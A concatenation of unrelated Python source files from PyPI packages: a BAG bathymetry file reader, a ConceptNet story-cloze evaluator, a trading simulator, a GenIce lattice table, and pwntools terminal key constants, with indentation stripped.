yield from ((''.join(g[0][0] for g in b), ''.join(g[0][1] for g in b), ''.join(g[0][2] for g in b), b[0][1][:-1]) for b in blocks_gr)
else:
if paleo:
yield from ((''.join(g[0][0] for g in b), [(*g[0], g[1]) for g in b]) for b in blocks_gr)
else:
yield from ((''.join(g[0][0] for g in b), [(*g[0][:-1], g[1]) for g in b]) for b in blocks_gr)
except PrivateFileError:
raise PrivateFileError
except IndexError:
raise IndexError
|
PypiClean
|
/hyo.bag-0.5.7-py3-none-any.whl/hyo/bag/bag.py
|
import os
import sys
import logging
import numpy as np
import h5py
from lxml import etree
logger = logging.getLogger(__name__)
from .base import is_bag, File
from .helper import BAGError, Helper
from .meta import Meta
class BAGFile(File):
""" Represents a BAG file. """
_bag_root = "BAG_root"
_bag_version = "Bag Version"
_bag_version_number = b'1.5.3'
_bag_elevation = "BAG_root/elevation"
_bag_elevation_min_ev = "Minimum Elevation Value"
_bag_elevation_max_ev = "Maximum Elevation Value"
_bag_metadata = "BAG_root/metadata"
_bag_tracking_list = "BAG_root/tracking_list"
_bag_tracking_list_len = "Tracking List Length"
_bag_tracking_list_type = np.dtype([('row', np.uint32), ('col', np.uint32),
('depth', np.float32), ('uncertainty', np.float32),
('track_code', np.byte), ('list_series', np.uint16)])
_bag_uncertainty = "BAG_root/uncertainty"
_bag_uncertainty_min_uv = "Minimum Uncertainty Value"
_bag_uncertainty_max_uv = "Maximum Uncertainty Value"
_bag_elevation_solution = "BAG_root/elevation_solution"
BAG_NAN = 1000000
default_metadata_file = "BAG_metadata.xml"
def __init__(self, name, mode=None, driver=None,
libver=None, userblock_size=None, swmr=False, **kwds):
"""
Create a new file object.
See the low level bag.File for a detailed explanation of the options.
"""
if mode is not None:
if 'w' not in mode:
if not is_bag(name):
raise BAGError("The passed file %s is not a BAG file")
super(BAGFile, self).__init__(name=name, mode=mode, driver=driver,
libver=libver, userblock_size=userblock_size, swmr=swmr, **kwds)
self.meta = None
self.meta_errors = list()
self._str = None
@classmethod
def create_template(cls, name):
""" create a BAG file with empty template structure """
logger.debug("create new BAG file: %s" % name)
try:
new_bag = File(name, 'w')
new_bag.create_group(cls._bag_root)
new_bag.attrs.create(cls._bag_version, cls._bag_version_number, shape=(), dtype="S5")
elevation = new_bag.create_dataset(cls._bag_elevation, shape=(), dtype=np.float32)
elevation.attrs.create(cls._bag_elevation_min_ev, 0.0, shape=(), dtype=np.float32)
elevation.attrs.create(cls._bag_elevation_max_ev, 0.0, shape=(), dtype=np.float32)
new_bag.create_dataset(cls._bag_metadata, shape=(1, ), dtype="S1")
tracking_list = new_bag.create_dataset(cls._bag_tracking_list, shape=(), dtype=cls._bag_tracking_list_type)
tracking_list.attrs.create(cls._bag_tracking_list_len, 0, shape=(), dtype=np.uint32)
uncertainty = new_bag.create_dataset(cls._bag_uncertainty, shape=(), dtype=np.float32)
uncertainty.attrs.create(cls._bag_uncertainty_min_uv, 0.0, shape=(), dtype=np.float32)
uncertainty.attrs.create(cls._bag_uncertainty_max_uv, 0.0, shape=(), dtype=np.float32)
except (BAGError, OSError) as e:
raise BAGError("Unable to create the BAG file %s: %s" % (name, e))
return new_bag
def has_elevation(self):
return BAGFile._bag_elevation in self
def elevation(self, mask_nan=True, row_range=None):
"""
Return the elevation as numpy array
mask_nan
If True, apply a mask using the BAG nan value
row_range
If present, a slice of rows to read from
"""
if row_range:
if not isinstance(row_range, slice):
raise BAGError("Invalid type of slice selector: %s" % type(row_range))
if (row_range.start < 0) or (row_range.start >= self.elevation_shape()[0]) \
or (row_range.stop < 0) or (row_range.stop > self.elevation_shape()[0]) \
or (row_range.start > row_range.stop):
raise BAGError("Invalid values for slice selector: %s" % row_range)
if mask_nan:
if row_range:
el = self[BAGFile._bag_elevation][row_range]
else:
el = self[BAGFile._bag_elevation][:]
mask = el == BAGFile.BAG_NAN
el[mask] = np.nan
return el
if row_range:
return self[BAGFile._bag_elevation][row_range]
else:
return self[BAGFile._bag_elevation][:]
def elevation_shape(self):
return self[BAGFile._bag_elevation].shape
def has_uncertainty(self):
return BAGFile._bag_uncertainty in self
def has_product_uncertainty(self):
if self.has_uncertainty() and \
(self.meta.unc_type == "productUncert" or self.meta.unc_type == "ProductUncert"): # Leidos bug
return True
return False
def uncertainty(self, mask_nan=True, row_range=None):
"""
Return the uncertainty as numpy array
mask_nan
If True, apply a mask using the BAG nan value
row_range
If present, a slice of rows to read from
"""
if row_range:
if not isinstance(row_range, slice):
raise BAGError("Invalid type of slice selector: %s" % type(row_range))
if (row_range.start < 0) or (row_range.start >= self.uncertainty_shape()[0]) \
or (row_range.stop < 0) or (row_range.stop > self.uncertainty_shape()[0]) \
or (row_range.start > row_range.stop):
raise BAGError("Invalid values for slice selector: %s" % row_range)
if mask_nan:
if row_range:
un = self[BAGFile._bag_uncertainty][row_range]
else:
un = self[BAGFile._bag_uncertainty][:]
mask = un == BAGFile.BAG_NAN
un[mask] = np.nan
return un
if row_range:
return self[BAGFile._bag_uncertainty][row_range]
else:
return self[BAGFile._bag_uncertainty][:]
def uncertainty_shape(self):
return self[BAGFile._bag_uncertainty].shape
def has_density(self):
try:
self[BAGFile._bag_elevation_solution]['num_soundings']
except Exception:
return False
return True
def density(self, mask_nan=True, row_range=None):
"""
Return the density as numpy array
mask_nan
If True, apply a mask using the BAG nan value
row_range
If present, a slice of rows to read from
"""
if row_range:
if not isinstance(row_range, slice):
raise BAGError("Invalid type of slice selector: %s" % type(row_range))
if (row_range.start < 0) or (row_range.start >= self.density_shape()[0]) \
or (row_range.stop < 0) or (row_range.stop > self.density_shape()[0]) \
or (row_range.start > row_range.stop):
raise BAGError("Invalid values for slice selector: %s" % row_range)
if mask_nan:
if row_range:
de = self[BAGFile._bag_elevation_solution]['num_soundings'][row_range]
else:
de = self[BAGFile._bag_elevation_solution]['num_soundings'][:]
de = de.astype(float)
mask = de == BAGFile.BAG_NAN
de[mask] = np.nan
return de
if row_range:
de = self[BAGFile._bag_elevation_solution]['num_soundings'][row_range]
else:
de = self[BAGFile._bag_elevation_solution]['num_soundings'][:]
de = de.astype(float)
return de
def density_shape(self):
return self[BAGFile._bag_elevation_solution].shape
def tracking_list(self):
""" Return the tracking list as numpy array """
return self[BAGFile._bag_tracking_list][:]
def tracking_list_fields(self):
""" Return the tracking list field names """
return self[BAGFile._bag_tracking_list].dtype.names
def tracking_list_types(self):
""" Return the tracking list field names """
return self[BAGFile._bag_tracking_list].dtype
def metadata(self, as_string=True, as_pretty_xml=True):
""" Return the metadata
as_string
If True, convert the metadata from a dataset of characters to a string
as_pretty_xml
If True, return the xml in a pretty format
"""
if as_string and not as_pretty_xml:
try:
return self[BAGFile._bag_metadata][:].tostring()
except RuntimeError as e:
logger.info("exception raised: %s" % e)
return None
if as_pretty_xml:
try:
xml_tree = etree.fromstring(self[BAGFile._bag_metadata][:].tostring())
return etree.tostring(xml_tree, pretty_print=True)
except RuntimeError as e:
logger.info("exception raised: %s" % e)
return None
return self[BAGFile._bag_metadata][:]
def extract_metadata(self, name=None):
""" Save metadata on disk
name
The file path where the metadata will be saved. If None, use a default name.
"""
meta_xml = self.metadata(as_pretty_xml=True)
if meta_xml is None:
logger.info("unable to access the metadata")
return
if name is None:
name = os.path.join(self.default_metadata_file)
with open(os.path.abspath(name), 'w') as fid:
fid.write(meta_xml.decode())
def substitute_metadata(self, path):
""" Substitute internal metadata
name
The file path where the new metadata are.
"""
path = os.path.abspath(path)
if not os.path.exists(path):
logger.info("the passed file does not exist")
return
with open(path, 'r') as fid:
xml_string = str.encode(fid.read())
is_valid = self.validate_metadata(xml_string)
if not is_valid:
logger.info("the passed medatadata file is not valid")
return
del self[BAGFile._bag_metadata]
xml_sz = len(xml_string)
self.create_dataset(self._bag_metadata, (xml_sz, ), dtype="S1")
for i, bt in enumerate(xml_string):
self[BAGFile._bag_metadata][i] = bt
def validate_metadata(self, xml_string=None):
""" Validate metadata based on XML Schemas and schematron. """
# clean metadata error list
self.meta_errors = list()
# assuming a valid BAG
is_valid = True
if xml_string is None:
xml_string = self.metadata(as_pretty_xml=True)
try:
xml_tree = etree.fromstring(xml_string)
except etree.Error as e:
logger.warning("unabled to parse XML metadata: %s" % e)
self.meta_errors.append(e)
return False
try:
schema_path = os.path.join(Helper.iso19139_folder(), 'bag', 'bag.xsd')
schema_doc = etree.parse(schema_path)
schema = etree.XMLSchema(schema_doc)
except etree.Error as e:
logger.warning("unabled to parse XML schema: %s" % e)
self.meta_errors.append(e)
return False
try:
schema.assertValid(xml_tree)
except etree.DocumentInvalid as e:
logger.warning("invalid metadata based on XML schema: %s" % e)
self.meta_errors.append(e)
for i in schema.error_log:
self.meta_errors.append(i)
is_valid = False
if is_valid:
logger.debug("xsd validated")
try:
schematron_path = os.path.join(Helper.iso19757_3_folder(), 'bag_metadata_profile.sch')
schematron_doc = etree.parse(schematron_path)
except etree.DocumentInvalid as e:
logger.warning("unabled to parse BAG schematron: %s" % e)
self.meta_errors.append(e)
return False
try:
from lxml import isoschematron
except IOError as e:
msg = "Unable to load lxml isoschematron files"
logger.warning("%s: %s" % (msg, e))
self.meta_errors.append(e)
return False
try:
schematron = isoschematron.Schematron(schematron_doc, store_report=True)
except etree.DocumentInvalid as e:
logger.warning("unabled to load BAG schematron: %s" % e)
self.meta_errors.append(e)
return False
if schematron.validate(xml_tree):
logger.debug("schematron validated")
else:
logger.warning("invalid metadata based on Schematron")
is_valid = False
ns = {
'svrl': 'http://purl.oclc.org/dsdl/svrl',
}
for i in schematron.error_log:
err_tree = etree.fromstring(i.message)
# print(etree.tostring(err_tree, pretty_print=True))
err_msg = err_tree.xpath('/svrl:failed-assert/svrl:text', namespaces=ns)[0].text.strip()
logger.warning(err_msg)
self.meta_errors.append(err_msg)
return is_valid
def validation_info(self):
""" Return a message string with the result of the validation """
msg = str()
msg += "XML input source: %s\nValidation output: " % self._bag_metadata
if self.validate_metadata():
msg += "VALID"
else:
msg += "INVALID\nReasons:\n"
for err_msg in self.meta_errors:
msg += " - %s\n" % err_msg
return msg
def populate_metadata(self):
""" Populate metadata class """
if self.meta is not None:
# log.debug("metadata already populated")
return self.meta
self.meta = Meta(meta_xml=self.metadata(as_pretty_xml=True))
return self.meta
def modify_wkt_prj(self, wkt_hor, wkt_ver=None):
""" Modify the wkt prj in the metadata content
text
The new wkt prj text to use
"""
ns = {
'bag': 'http://www.opennavsurf.org/schema/bag',
'gco': 'http://www.isotc211.org/2005/gco',
'gmd': 'http://www.isotc211.org/2005/gmd',
'gmi': 'http://www.isotc211.org/2005/gmi',
'gml': 'http://www.opengis.net/gml/3.2',
'xsi': 'http://www.w3.org/2001/XMLSchema-instance',
}
print(self[BAGFile._bag_metadata][:])
xml_tree = etree.fromstring(self[BAGFile._bag_metadata][:].tostring())
try:
ret = xml_tree.xpath('//*/gmd:referenceSystemInfo/gmd:MD_ReferenceSystem/'
'gmd:referenceSystemIdentifier/gmd:RS_Identifier/gmd:code/gco:CharacterString',
namespaces=ns)
ret[0].text = wkt_hor
if wkt_ver is not None:
ret[1].text = wkt_ver
except etree.Error as e:
logger.warning("unable to read the WKT projection string: %s" % e)
return
new_xml = etree.tostring(xml_tree, pretty_print=True)
del self[BAGFile._bag_metadata]
ds = self.create_dataset(BAGFile._bag_metadata, shape=(len(new_xml), ), dtype="S1")
for i, x in enumerate(new_xml):
ds[i] = bytes([x])
def modify_bbox(self, west, east, south, north):
""" attempts to modify the bounding box values """
ns = {
'bag': 'http://www.opennavsurf.org/schema/bag',
'gco': 'http://www.isotc211.org/2005/gco',
'gmd': 'http://www.isotc211.org/2005/gmd',
'gmi': 'http://www.isotc211.org/2005/gmi',
'gml': 'http://www.opengis.net/gml/3.2',
'xsi': 'http://www.w3.org/2001/XMLSchema-instance',
}
xml_tree = etree.fromstring(self[BAGFile._bag_metadata][:].tostring())
try:
ret_x_min = xml_tree.xpath('//*/gmd:EX_GeographicBoundingBox/gmd:westBoundLongitude/gco:Decimal',
namespaces=ns)
ret_x_max = xml_tree.xpath('//*/gmd:EX_GeographicBoundingBox/gmd:eastBoundLongitude/gco:Decimal',
namespaces=ns)
except etree.Error as e:
logger.warning("unable to read the bbox's longitude values: %s" % e)
return
try:
ret_x_min[0].text = "%s" % west
ret_x_max[0].text = "%s" % east
except (ValueError, IndexError) as e:
logger.warning("unable to read the bbox's longitude values: %s" % e)
return
try:
ret_y_min = xml_tree.xpath('//*/gmd:EX_GeographicBoundingBox/gmd:southBoundLatitude/gco:Decimal',
namespaces=ns)
ret_y_max = xml_tree.xpath('//*/gmd:EX_GeographicBoundingBox/gmd:northBoundLatitude/gco:Decimal',
namespaces=ns)
except etree.Error as e:
logger.warning("unable to read the bbox's latitude values: %s" % e)
return
try:
ret_y_min[0].text = "%s" % south
ret_y_max[0].text = "%s" % north
except (ValueError, IndexError) as e:
logger.warning("unable to read the bbox's latitude values: %s" % e)
return
new_xml = etree.tostring(xml_tree, pretty_print=True)
del self[BAGFile._bag_metadata]
ds = self.create_dataset(BAGFile._bag_metadata, shape=(len(new_xml),), dtype="S1")
for i, x in enumerate(new_xml):
ds[i] = bytes([x])
def _str_group_info(self, grp):
if grp == self._bag_root:
self._str += " <root>\n"
elif grp == self._bag_elevation:
self._str += " <elevation shape=%s>\n" % str(self.elevation().shape)
elif grp == self._bag_uncertainty:
self._str += " <uncertainty shape=%s>\n" % str(self.uncertainty().shape)
elif grp == self._bag_tracking_list:
self._str += " <tracking list shape=%s>\n" % str(self.tracking_list().shape)
elif grp == self._bag_metadata:
if self.meta is not None:
self._str += " %s\n" % str(self.meta)
else:
self._str += " <%s>\n" % grp
else:
self._str += " <%s>\n" % grp
if grp != self._bag_metadata:
for atr in self[grp].attrs:
atr_val = self[grp].attrs[atr]
self._str += " <%s: %s (%s, %s)>\n" % (atr, atr_val, atr_val.shape, atr_val.dtype)
def __str__(self):
self._str = super(BAGFile, self).__str__()
self.visit(self._str_group_info)
return self._str
|
PypiClean
|
/ConceptNet-5.7.0.tar.gz/ConceptNet-5.7.0/conceptnet5/vectors/evaluation/story.py
|
import pandas as pd
from statsmodels.stats.proportion import proportion_confint
from conceptnet5.util import get_support_data_filename
from conceptnet5.vectors import cosine_similarity
from conceptnet5.vectors.query import VectorSpaceWrapper
def read_cloze(filename):
with open(filename, encoding='utf-8') as file:
file.readline() # throw away header
for line in file:
if line.rstrip():
items = line.rstrip().split('\t')
uuid, sent1, sent2, sent3, sent4, answer1, answer2, answer_num = items
if answer_num == '1':
right_answer = answer1
wrong_answer = answer2
elif answer_num == '2':
right_answer = answer2
wrong_answer = answer1
else:
raise ValueError("Unrecognized answer number: %r" % answer_num)
yield ((sent1, sent2, sent3, sent4), (right_answer, wrong_answer))
def evaluate(frame, subset='val'):
"""
Evaluate a DataFrame containing term vectors on its ability to predict term
relatedness, according to MEN-3000, RW, MTurk-771, and WordSim-353. Use a
VectorSpaceWrapper to fill missing vocabulary from ConceptNet.
Return a Series containing these labeled results.
"""
# Make subset names consistent with other datasets
if subset == 'dev':
subset = 'val'
elif subset == 'all':
# for the final evaluation, use just the test data
subset = 'test'
filename = get_support_data_filename(
'story-cloze/cloze_test_spring2016_%s.tsv' % subset
)
vectors = VectorSpaceWrapper(frame=frame)
total = 0
correct = 0
for sentences, answers in read_cloze(filename):
text = ' '.join(sentences)
right_answer, wrong_answer = answers
probe_vec = vectors.text_to_vector('en', text)
right_vec = vectors.text_to_vector('en', right_answer)
wrong_vec = vectors.text_to_vector('en', wrong_answer)
right_sim = cosine_similarity(probe_vec, right_vec)
wrong_sim = cosine_similarity(probe_vec, wrong_vec)
if right_sim > wrong_sim:
correct += 1
total += 1
# print("%+4.2f %s / %s / %s" % (right_sim - wrong_sim, text, right_answer, wrong_answer))
low, high = proportion_confint(correct, total)
return pd.Series([correct / total, low, high], index=['acc', 'low', 'high'])
|
PypiClean
|
/sdmaster-1.0.8.tar.gz/sdmaster-1.0.8/sdm/simulation/trader.py
|
import logging
from sdm.util.date_utils import date_to_string
import matplotlib.pyplot as plt
import numpy as np
DEFAULT_COMMISSION_FLAT_FEE = 0
REALTIME_PRICE_KEY = "price"
def default_commission(transaction):
if transaction.action < 0 and transaction.price * transaction.amount < DEFAULT_COMMISSION_FLAT_FEE:
return 0
return DEFAULT_COMMISSION_FLAT_FEE
class Trader:
def __init__(self, strategy_function, init_fund, start_date, end_date, commission_calc_func=default_commission,
name="Default Trader"):
"""
The trader is an individual trader that performs its own tradings in the market object.
:param strategy_function: a function to decide whether to make a trade, on which symbol, to buy or sell for
what volume. This should be a generator function that yields Transaction objects representing the transactions
to be made, based on the current day's market data (or real time price if available), the cumulative market
data up to today, current position, total cash, and its trading history.
:param init_fund: the total cash this trader initially has
:param start_date: a datetime object for the start date of trading
:param end_date: a datetime object for the end date of trading
:param commission_calc_func: A function that takes price and volume to calculate the commission fee. Default
is $7 per transaction
:param name:
"""
if not callable(strategy_function):
raise ValueError("Variable strategy_function must be a function, but passed in as {} instead".format(
type(strategy_function)))
self._func = strategy_function
self._start_date = start_date
self._end_date = end_date
self._current_day = start_date
self._init_fund = init_fund
self.cash = init_fund
self._name = name
self._position = {}
self._latest_close_price = {}
self.commission_calc_func = commission_calc_func
self._transaction_history = []
def reset(self):
self._current_day = self._start_date
self.cash = self._init_fund
self._position = {}
self._latest_close_price = {}
self._transaction_history = []
def set_func(self, func):
self._func = func
@property
def cash(self):
return self._cash
@cash.setter
def cash(self, cash):
if cash < 0:
raise ValueError("Cash must be a positive number but given {}".format(cash))
self._cash = cash
def is_valid_transaction(self, transaction, current_price):
if transaction.action > 0 and transaction.price < current_price:
logging.error("Error: you try to buy {} at price {} but the market lowest price is {}. Skipping.".format(
transaction.symbol, transaction.price, current_price))
return False
if transaction.action < 0 and transaction.price > current_price:
logging.error("Error: you try to sell {} at price {} but the market highest price is {}. Skipping.".format(
transaction.symbol, transaction.price, current_price))
return False
if transaction.action > 0 and self.cash < transaction.amount * transaction.price + self.commission_calc_func(
transaction):
logging.error("Error: you only have cash of {}, which is not enough to buy {} stocks of {} at price {} "
"with commission {}".format(self.cash, transaction.amount, transaction.symbol,
transaction.price, self.commission_calc_func(transaction)))
return False
if transaction.action < 0 and self._position[transaction.symbol] < transaction.amount:
logging.error("Error: you only have {} stock of {}, which is not enough to sell for {}".format(
self._position[transaction.symbol], transaction.symbol, transaction.amount))
return False
return True
def make_trades(self, market_data_cumulative, current_day, real_time_price=None, force=False):
if current_day < self._current_day:
raise ValueError("CAN NOT go backwards: Current day for the trader is {} but the date to make trade is {}"
.format(date_to_string(self._current_day), date_to_string(current_day)))
self._current_day = current_day
transactions = self._func(market_data_cumulative=market_data_cumulative, current_day=current_day,
position=self._position, cash=self.cash,
transaction_history=self._transaction_history,
real_time_price=real_time_price)
valid_transactions = []
for transaction in transactions:
if real_time_price is not None:
# If we are checking against real market data
if transaction.symbol in real_time_price:
current_price = real_time_price[transaction.symbol][REALTIME_PRICE_KEY]
else:
logging.error("Trying to make a transaction on symbol {} on {} but cannot find it in realtime "
"price data. Skipping this transaction".format(transaction.symbol, current_day))
continue
else:
# If we are only simulating a trade, then use the previous close price as realtime price
if transaction.symbol in market_data_cumulative[current_day]:
current_price = market_data_cumulative[current_day][transaction.symbol]["close"]
self._latest_close_price[transaction.symbol] = current_price
elif transaction.symbol in self._latest_close_price:
# In case we have gap in data, we will use the previous closing price for buy/sell
current_price = self._latest_close_price[transaction.symbol]
else:
logging.error("Trying to make a transaction on symbol {} on {} without any price data. Skipping "
"this transaction".format(transaction.symbol, current_day))
continue
if force or self.is_valid_transaction(transaction, current_price):
logging.debug("{}ing amount {} on {} with price {}. Cash: {}".format(
transaction.get_action_name(), transaction.amount, transaction.symbol, transaction.price,
self._cash))
self.cash -= transaction.action * (transaction.amount * transaction.price + transaction.action *
self.commission_calc_func(transaction))
if transaction.symbol not in self._position:
self._position[transaction.symbol] = transaction.action * transaction.amount
else:
self._position[transaction.symbol] += transaction.action * transaction.amount
self._transaction_history.append(transaction)
valid_transactions.append(transaction)
else:
logging.error("Invalid transaction with reason shown above. Skipping this transaction.")
return valid_transactions
def log_assets(self):
logging.info("Total value of the trader {}: {} on day {}".format(self._name, self.get_total_value(),
date_to_string(self._current_day)))
def get_trading_history(self):
return self._transaction_history
def set_trading_history(self, trading_history):
self._transaction_history = trading_history
def get_start_date(self):
return self._start_date
def get_end_date(self):
return self._end_date
def get_name(self):
return self._name
def get_init_fund(self):
return self._init_fund
def get_position(self):
return self._position
def get_total_value(self):
total_value = self.cash
for (symbol, holds) in self._position.items():
if symbol in self._latest_close_price:
total_value += self._latest_close_price[symbol] * holds
else:
# If there is not a latest price, use the last bought price
for transaction in reversed(self._transaction_history):
if symbol == transaction.symbol and transaction.is_buy():
total_value += transaction.price * holds
break
return total_value
def plot_performance(self):
value_history = {}
transaction_list = []
for transaction in self._transaction_history:
if transaction.action > 0:
if transaction.symbol not in value_history:
value_history[transaction.symbol] = (transaction.amount, transaction.amount * transaction.price)
else:
(last_vol, last_value) = value_history[transaction.symbol]
value_history[transaction.symbol] = (transaction.amount + last_vol,
last_value + transaction.amount * transaction.price)
else:
(last_vol, last_value) = value_history[transaction.symbol]
assert (transaction.amount == last_vol)
transaction_list.append(transaction.amount * transaction.price - last_value)
value_history[transaction.symbol] = (0, 0)
plt.hist(np.array(transaction_list), bins=100, range=(-1000, 1000), label=self._name)
logging.info("Trader {}: {} profitable transactions, {} non-profitable transactions".format(
self._name, sum(x > 0 for x in transaction_list), sum(x < 0 for x in transaction_list)))
logging.info("Trader {}: Profit from transactions is {}, Loss from transactions is {}: ".format(
self._name, sum(x for x in transaction_list if x > 0), sum(x for x in transaction_list if x < 0)))
logging.info("Trader {}: The mean of the transactions is {} and the standard deviation is {}".format(
self._name, np.mean(transaction_list), np.std(transaction_list)))
logging.info("Trader {}: Between -500 and 500 the mean is {} and the standard deviation is {}".format(
self._name, np.mean(list(x for x in transaction_list if abs(x) < 500)),
np.std(list(x for x in transaction_list if abs(x) < 500))))
plt.legend(loc='upper right')
plt.show()
|
PypiClean
|
/GenIce2-2.1.7.1.tar.gz/GenIce2-2.1.7.1/genice2/lattices/2_2_623457.py
|
from genice2.cell import cellvectors
import genice2.lattices
import numpy as np
desc = {
"ref": {
"2_2_623457": "Engel 2018"
},
"usage": "No options available.",
"brief": "Hypothetical zeolitic ice"
}
class Lattice(genice2.lattices.Lattice):
def __init__(self):
self.cell = cellvectors(
a=25.83251,
b=29.04093,
c=27.40942,
A=90.0,
B=90.0,
C=90.0
)
self.waters = np.array([
[0.166953, 0.083210, 0.011201],
[0.163821, 0.418768, 0.263662],
[0.000289, 0.333207, 0.011200],
[-0.002839, 0.168759, 0.263656],
[-0.003007, 0.336496, 0.324382],
[0.001657, 0.164088, 0.074798],
[0.163672, 0.086511, 0.324369],
[0.168306, 0.414109, 0.074784],
[0.500284, 0.083210, 0.011201],
[0.497153, 0.418768, 0.263662],
[0.333622, 0.333207, 0.011200],
[0.330494, 0.168760, 0.263655],
[0.330327, 0.336496, 0.324382],
[0.334990, 0.164088, 0.074798],
[0.497006, 0.086512, 0.324368],
[0.501639, 0.414109, 0.074783],
[-0.166381, 0.083210, 0.011201],
[-0.169513, 0.418768, 0.263662],
[0.666954, 0.333207, 0.011200],
[0.663826, 0.168759, 0.263655],
[0.663660, 0.336496, 0.324382],
[0.668325, 0.164088, 0.074799],
[-0.169661, 0.086511, 0.324368],
[-0.165028, 0.414109, 0.074784],
[0.166953, 0.583211, 0.011201],
[0.163821, -0.081232, 0.263662],
[0.000289, -0.166793, 0.011200],
[-0.002839, 0.668760, 0.263655],
[-0.003006, -0.163503, 0.324382],
[0.001657, 0.664087, 0.074798],
[0.163672, 0.586510, 0.324368],
[0.168306, -0.085893, 0.074783],
[0.500284, 0.583211, 0.011201],
[0.497153, -0.081232, 0.263662],
[0.333622, -0.166793, 0.011200],
[0.330494, 0.668760, 0.263656],
[0.330327, -0.163504, 0.324382],
[0.334990, 0.664087, 0.074798],
[0.497006, 0.586510, 0.324368],
[0.501639, -0.085893, 0.074783],
[-0.166381, 0.583211, 0.011201],
[-0.169513, -0.081232, 0.263662],
[0.666954, -0.166793, 0.011200],
[0.663826, 0.668760, 0.263655],
[0.663660, -0.163503, 0.324382],
[0.668325, 0.664087, 0.074799],
[-0.169661, 0.586510, 0.324368],
[-0.165028, -0.085893, 0.074784],
[0.161138, 0.083694, 0.511426],
[0.172129, 0.416268, -0.239019],
[-0.005527, 0.333700, 0.511441],
[0.005476, 0.166273, -0.239024],
[0.005465, 0.333667, -0.177656],
[-0.005502, 0.166391, 0.572270],
[0.172145, 0.083677, -0.177647],
[0.161136, 0.416402, 0.572267],
[0.494470, 0.083693, 0.511426],
[0.505464, 0.416268, -0.239019],
[0.327807, 0.333700, 0.511441],
[0.338810, 0.166274, -0.239024],
[0.338798, 0.333667, -0.177656],
[0.327831, 0.166392, 0.572270],
[0.505479, 0.083677, -0.177647],
[0.494470, 0.416402, 0.572267],
[-0.172195, 0.083693, 0.511426],
[-0.161205, 0.416268, -0.239019],
[0.661140, 0.333700, 0.511441],
[0.672141, 0.166273, -0.239024],
[0.672130, 0.333667, -0.177656],
[0.661163, 0.166390, 0.572270],
[-0.161189, 0.083677, -0.177647],
[-0.172197, 0.416402, 0.572267],
[0.161137, 0.583693, 0.511426],
[0.172128, -0.083732, -0.239019],
[-0.005527, -0.166300, 0.511441],
[0.005477, 0.666273, -0.239024],
[0.005465, -0.166333, -0.177656],
[-0.005502, 0.666391, 0.572270],
[0.172145, 0.583676, -0.177647],
[0.161136, -0.083599, 0.572267],
[0.494470, 0.583693, 0.511426],
[0.505464, -0.083731, -0.239019],
[0.327807, -0.166300, 0.511441],
[0.338810, 0.666273, -0.239024],
[0.338798, -0.166333, -0.177656],
[0.327831, 0.666391, 0.572270],
[0.505479, 0.583676, -0.177647],
[0.494470, -0.083599, 0.572267],
[-0.172196, 0.583693, 0.511426],
[-0.161204, -0.083731, -0.239019],
[0.661140, -0.166300, 0.511441],
[0.672141, 0.666273, -0.239024],
[0.672130, -0.166333, -0.177656],
[0.661163, 0.666391, 0.572270],
[-0.161189, 0.583676, -0.177647],
[-0.172197, -0.083599, 0.572267],
])
self.coord = 'relative'
|
PypiClean
|
/angr-pwntools-4.5.0.tar.gz/angr-pwntools-4.5.0/pwnlib/term/keyconsts.py
|
TYPE_UNICODE = 1
TYPE_KEYSYM = 2
TYPE_FUNCTION = 3
TYPE_POSITION = 4
TYPE_EOF = 5
TYPE_UNKNOWN = 6
TYPE_UNKNOWN_CSI = 7
# Must be these exact values for CSI parsing to work
MOD_NONE = 0
MOD_SHIFT = 1 << 0
MOD_ALT = 1 << 1
MOD_CTRL = 1 << 2
# Special names in C0
KEY_BACKSPACE = 1
KEY_TAB = 2
KEY_ENTER = 3
KEY_ESCAPE = 4
# Special names in G0
KEY_SPACE = 5
KEY_DEL = 6
# Special keys
KEY_UP = 7
KEY_DOWN = 8
KEY_LEFT = 9
KEY_RIGHT = 10
KEY_BEGIN = 11
KEY_FIND = 12
KEY_INSERT = 13
KEY_DELETE = 14
KEY_SELECT = 15
KEY_PAGEUP = 16
KEY_PAGEDOWN = 17
KEY_HOME = 18
KEY_END = 19
# Special keys from terminfo
KEY_CANCEL = 20
KEY_CLEAR = 21
KEY_CLOSE = 22
KEY_COMMAND = 23
KEY_COPY = 24
KEY_EXIT = 25
KEY_HELP = 26
KEY_MARK = 27
KEY_MESSAGE = 28
KEY_MOVE = 29
KEY_OPEN = 30
KEY_OPTIONS = 31
KEY_PRINT = 32
KEY_REDO = 33
KEY_REFERENCE = 34
KEY_REFRESH = 35
KEY_REPLACE = 36
KEY_RESTART = 37
KEY_RESUME = 38
KEY_SAVE = 39
KEY_SUSPEND = 40
KEY_UNDO = 41
# Numeric keypad special keys
KEY_KP0 = 42
KEY_KP1 = 43
KEY_KP2 = 44
KEY_KP3 = 45
KEY_KP4 = 46
KEY_KP5 = 47
KEY_KP6 = 48
KEY_KP7 = 49
KEY_KP8 = 50
KEY_KP9 = 51
KEY_KPENTER = 52
KEY_KPPLUS = 53
KEY_KPMINUS = 54
KEY_KPMULT = 55
KEY_KPDIV = 56
KEY_KPCOMMA = 57
KEY_KPPERIOD = 58
KEY_KPEQUALS = 59
# Name mapping
KEY_NAMES = {
KEY_BACKSPACE : '<backspace>',
KEY_TAB : '<tab>',
KEY_ENTER : '<enter>',
KEY_ESCAPE : '<escape>',
KEY_SPACE : '<space>',
KEY_DEL : '<del>',
KEY_UP : '<up>',
KEY_DOWN : '<down>',
KEY_LEFT : '<left>',
KEY_RIGHT : '<right>',
KEY_BEGIN : '<begin>',
KEY_FIND : '<find>',
KEY_INSERT : '<insert>',
KEY_DELETE : '<delete>',
KEY_SELECT : '<select>',
KEY_PAGEUP : '<page up>',
KEY_PAGEDOWN : '<page down>',
KEY_HOME : '<home>',
KEY_END : '<end>',
KEY_CANCEL : '<cancel>',
KEY_CLEAR : '<clear>',
KEY_CLOSE : '<close>',
KEY_COMMAND : '<command>',
KEY_COPY : '<copy>',
KEY_EXIT : '<exit>',
KEY_HELP : '<help>',
KEY_MARK : '<mark>',
KEY_MESSAGE : '<message>',
KEY_MOVE : '<move>',
KEY_OPEN : '<open>',
KEY_OPTIONS : '<options>',
KEY_PRINT : '<print>',
KEY_REDO : '<redo>',
KEY_REFERENCE : '<reference>',
KEY_REFRESH : '<refresh>',
KEY_REPLACE : '<replace>',
KEY_RESTART : '<restart>',
KEY_RESUME : '<resume>',
KEY_SAVE : '<save>',
KEY_SUSPEND : '<suspend>',
KEY_UNDO : '<undo>',
KEY_KP0 : '<kp0>',
KEY_KP1 : '<kp1>',
KEY_KP2 : '<kp2>',
KEY_KP3 : '<kp3>',
